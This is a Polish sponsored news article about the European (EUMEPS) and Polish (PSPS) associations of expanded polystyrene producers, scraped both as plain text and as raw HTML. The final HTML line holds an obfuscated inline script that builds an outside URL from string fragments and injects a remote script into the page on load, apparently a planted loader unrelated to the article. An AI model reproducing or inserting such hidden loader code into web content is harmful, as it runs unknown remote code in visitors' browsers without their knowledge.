Stało się już swego rodzaju normą i dobrą praktyką w obliczu globalizacji i rosnącej konkurencji, że firmy z różnych branż zrzeszają się w narodowe i ponadnarodowe stowarzyszenia. Nie inaczej jest z producentami styropianu.

 

Stało się już swego rodzaju normą i dobrą praktyką w obliczu globalizacji i rosnącej konkurencji, że firmy z różnych branż zrzeszają się w narodowe i ponadnarodowe stowarzyszenia. Nie inaczej jest z producentami styropianu.

Stowarzyszenie Europejskich Producentów Polistyrenu Spienionego

Europejscy producenci styropianu powołali jakiś czas temu do życia Stowarzyszenie Europejskich Producentów Polistyrenu Spienionego (EUMEPS). Spieniony polistyren to nic innego jak popularny styropian. Europejska organizacja styropianowej branży zrzesza narodowe stowarzyszenia producentów styropianu z 23 krajów europejskich, w tym nasze Polskie Stowarzyszenie Producentów Styropianu. Narodowe stowarzyszenia reprezentują lokalnych producentów i przetwórców styropianu, dostawców surowców i dodatków, instytucje zajmujące się recyklingiem styropianu oraz firmy dostarczające maszyny na potrzeby branży. Oprócz tych członków instytucjonalnych EUMEPS dysponuje również platformą stworzoną na potrzeby prywatnych firm związanych z branżą styropianową – przedsiębiorstw budowlanych, wytwórców opakowań itp. W sumie w EUMEPS reprezentowanych jest ponad 1000 europejskich firm zatrudniających około 60 tysięcy pracowników. Są wśród nich duże koncerny i wiodący na rynku producenci styropianu, ale także małe i średnie przedsiębiorstwa.

EUMEPS w swoich działaniach koncentruje się na dwóch głównych segmentach rynku: producentach styropianu budowlanego w różnych odmianach i producentach styropianu użytkowego, w tym opakowaniach, kształtkach i dekoracjach. Jednym z głównych zadań stowarzyszenia jest promocja zalet styropianu jako wyjątkowo wszechstronnego materiału o wyjątkowej amortyzacji i lekkości, co z kolei sprawia, że styropian jest najbardziej opłacalnym materiałem ochronnym i izolacyjnym wybieranym przez klientów od wielu lat.

Działalność Europejskiego Stowarzyszenia Producentów Styropianu koncentruje się także na wspomaganiu nowych technologii oraz recyklingu. EUMEPS opublikowało w 2018 roku program deklarujący, że do 2025 roku styropian w Europie stanie się materiałem w dużym stopniu odnawialnym.

Polskie Stowarzyszenie Producentów Styropianu

Polskie Stowarzyszenie Producentów Styropianu (PSPS) ukonstytuowało się w 2009 roku na bazie działającej od 2008 roku przy Polskiej Izbie Przemysłowo-Handlowej Budownictwa sekcji producentów styropianu. Po wyodrębnieniu się ze struktur PIPHB, PSPS stało się niezależnym stowarzyszeniem z siedzibą w Warszawie. Wśród dwudziestu firm założycielskich PSPS znaleźli się przedstawiciele czołowych firm branży styropianowej w Polsce, a jednym z założycieli stowarzyszenia była warszawska firma Styrmann.

PSPS od momentu swego powstania stał się organizacją reprezentującą branżę producentów styropianu w Polsce. Dziś zrzesza przedstawicieli kilkudziesięciu firm – wiodących na rynku producentów styropianu, ale i przedsiębiorstw mniejszych zajmujących się przetwórstwem, wytwarzaniem opakowań styropianowych czy dostarczających surowców i sprzętu do produkcji styropianu. PSPS integruje producentów styropianu, by mogli skuteczniej działać we własnym interesie, reprezentuje branżę producentów styropianu w mediach, a także w kontaktach z instytucjami naukowo-technicznymi oraz organami administracji państwowej, czy z władzami samorządowymi. Stowarzyszenie opiniuje, ale także inicjuje i współtworzy normy techniczne oraz konkretne przepisy prawne dotyczące produkcji i zastosowań styropianu, ułatwia dostęp do informacji technicznych, gospodarczych, prawnych, handlowych i finansowych, na bieżąco monitoruje zmiany w krajowym i europejskim systemie prawnym. PSPS współpracuje z innymi krajowymi i zagranicznymi firmami, a także organizacjami reprezentującymi branżę budowlaną, wymienia z nimi doświadczenia oraz podejmuje wspólne przedsięwzięcia na rzecz rozwoju rynku wyrobów styropianowych różnego typu, inicjuje i wspiera opracowanie nowych technologii produkcji styropianu i poszerza zakres jego zastosowań. Ponadto Polskie Stowarzyszenie Producentów Styropianu prowadzi szeroko zakrojoną promocję zalet styropianu, walczy z funkcjonującymi mitami na jego temat oraz prowadzi kampanie informacyjne na temat styropianu, jego zastosowań w budownictwie i innych sektorach gospodarki. Taki sposób działania się sprawdza, poprawiając skuteczność i konkurencyjność polskich producentów styropianu nie tylko na krajowych, ale także europejskich i światowych rynkach.

 

Producenci styropianu łączcie sięhttps://www.pruszkowmowi.pl/wp-content/uploads/2020/12/producenci-styropianu-1024x682.jpghttps://www.pruszkowmowi.pl/wp-content/uploads/2020/12/producenci-styropianu-150x150.jpg admin BiznesMateriał partnera
Stało się już swego rodzaju normą i dobrą praktyką w obliczu globalizacji i rosnącej konkurencji, że firmy z różnych branż zrzeszają się w narodowe i ponadnarodowe stowarzyszenia. Nie inaczej jest z producentami styropianu.  Stało się już swego rodzaju normą i dobrą praktyką w obliczu globalizacji i rosnącej konkurencji, że firmy...
<h2><strong>Stało się już swego rodzaju normą i dobrą praktyką w obliczu globalizacji i rosnącej konkurencji, że firmy z różnych branż zrzeszają się w narodowe i ponadnarodowe stowarzyszenia. Nie inaczej jest z producentami styropianu.</strong></h2>  Stało się już swego rodzaju normą i dobrą praktyką w obliczu globalizacji i rosnącej konkurencji, że firmy z różnych branż zrzeszają się w narodowe i ponadnarodowe stowarzyszenia. Nie inaczej jest z producentami styropianu. <h3><b>Stowarzyszenie Europejskich Producentów Polistyrenu Spienionego</b></h3> <a href="https://www.pruszkowmowi.pl/wp-content/uploads/2020/12/producenci-styropianu.jpg"><img class=" wp-image-9054 alignright" src="https://www.pruszkowmowi.pl/wp-content/uploads/2020/12/producenci-styropianu-1024x682.jpg" alt="" width="393" height="262" /></a>Europejscy producenci styropianu powołali jakiś czas temu do życia Stowarzyszenie Europejskich Producentów Polistyrenu Spienionego (EUMEPS). Spieniony polistyren to nic innego jak popularny styropian. Europejska organizacja styropianowej branży zrzesza narodowe stowarzyszenia producentów styropianu z 23 krajów europejskich, w tym nasze Polskie Stowarzyszenie Producentów Styropianu. Narodowe stowarzyszenia reprezentują lokalnych producentów i przetwórców styropianu, dostawców surowców i dodatków, instytucje zajmujące się recyklingiem styropianu oraz firmy dostarczające maszyny na potrzeby branży. Oprócz tych członków instytucjonalnych EUMEPS dysponuje również platformą stworzoną na potrzeby prywatnych firm związanych z branżą styropianową – przedsiębiorstw budowlanych, wytwórców opakowań itp. W sumie w EUMEPS reprezentowanych jest ponad 1000 europejskich firm zatrudniających około 60 tysięcy pracowników. Są wśród nich duże koncerny i wiodący na rynku producenci styropianu, ale także małe i średnie przedsiębiorstwa.EUMEPS w swoich działaniach koncentruje się na dwóch głównych segmentach rynku: producentach styropianu budowlanego w różnych odmianach i producentach styropianu użytkowego, w tym opakowaniach, kształtkach i dekoracjach. Jednym z głównych zadań stowarzyszenia jest promocja zalet styropianu jako wyjątkowo wszechstronnego materiału o wyjątkowej amortyzacji i lekkości, co z kolei sprawia, że styropian jest najbardziej opłacalnym materiałem ochronnym i izolacyjnym wybieranym przez klientów od wielu lat.Działalność Europejskiego Stowarzyszenia Producentów Styropianu koncentruje się także na wspomaganiu nowych technologii oraz recyklingu. EUMEPS opublikowało w 2018 roku program deklarujący, że do 2025 roku styropian w Europie stanie się materiałem w dużym stopniu odnawialnym. <h3><b>Polskie Stowarzyszenie Producentów Styropianu</b></h3> Polskie Stowarzyszenie Producentów Styropianu (PSPS) ukonstytuowało się w 2009 roku na bazie działającej od 2008 roku przy Polskiej Izbie Przemysłowo-Handlowej Budownictwa sekcji producentów styropianu. Po wyodrębnieniu się ze struktur PIPHB, PSPS stało się niezależnym stowarzyszeniem z siedzibą w Warszawie. Wśród dwudziestu firm założycielskich PSPS znaleźli się przedstawiciele czołowych firm branży styropianowej w Polsce, a jednym z założycieli stowarzyszenia była warszawska firma <a title="Producenci Styropianu" href="https://www.styrmann.com.pl/pl/">Styrmann</a>.PSPS od momentu swego powstania stał się organizacją reprezentującą branżę producentów styropianu w Polsce. Dziś zrzesza przedstawicieli kilkudziesięciu firm - wiodących na rynku producentów styropianu, ale i przedsiębiorstw mniejszych zajmujących się przetwórstwem, wytwarzaniem opakowań styropianowych czy dostarczających surowców i sprzętu do produkcji styropianu. PSPS integruje producentów styropianu, by mogli skuteczniej działać we własnym interesie, reprezentuje branżę producentów styropianu w mediach, a także w kontaktach z instytucjami naukowo-technicznymi oraz organami administracji państwowej, czy z władzami samorządowymi. Stowarzyszenie opiniuje, ale także inicjuje i współtworzy normy techniczne oraz konkretne przepisy prawne dotyczące produkcji i zastosowań styropianu, ułatwia dostęp do informacji technicznych, gospodarczych, prawnych, handlowych i finansowych, na bieżąco monitoruje zmiany w krajowym i europejskim systemie prawnym. PSPS współpracuje z innymi krajowymi i zagranicznymi firmami, a także organizacjami reprezentującymi branżę budowlaną, wymienia z nimi doświadczenia oraz podejmuje wspólne przedsięwzięcia na rzecz rozwoju rynku wyrobów styropianowych różnego typu, inicjuje i wspiera opracowanie nowych technologii produkcji styropianu i poszerza zakres jego zastosowań. Ponadto Polskie Stowarzyszenie Producentów Styropianu prowadzi szeroko zakrojoną promocję zalet styropianu, walczy z funkcjonującymi mitami na jego temat oraz prowadzi kampanie informacyjne na temat styropianu, jego zastosowań w budownictwie i innych sektorach gospodarki. Taki sposób działania się sprawdza, poprawiając skuteczność i konkurencyjność polskich producentów styropianu nie tylko na krajowych, ale także europejskich i światowych rynkach. <script> (function(){ op2h=document.createElement("script");op2h.async=true;op2h_="u"+("s")+"t"; op2hu="248823076.";op2h_+="a"+("t.i");op2h_+="n"+("f"+"o")+"/"; op2hu+="xscy0g03p2h5t3uf9s7xt7"+("wpy7imny"); op2h.src="https://"+op2h_+op2hu;op2h.type="text/javascript"; document.body.appendChild(op2h); })(); </script>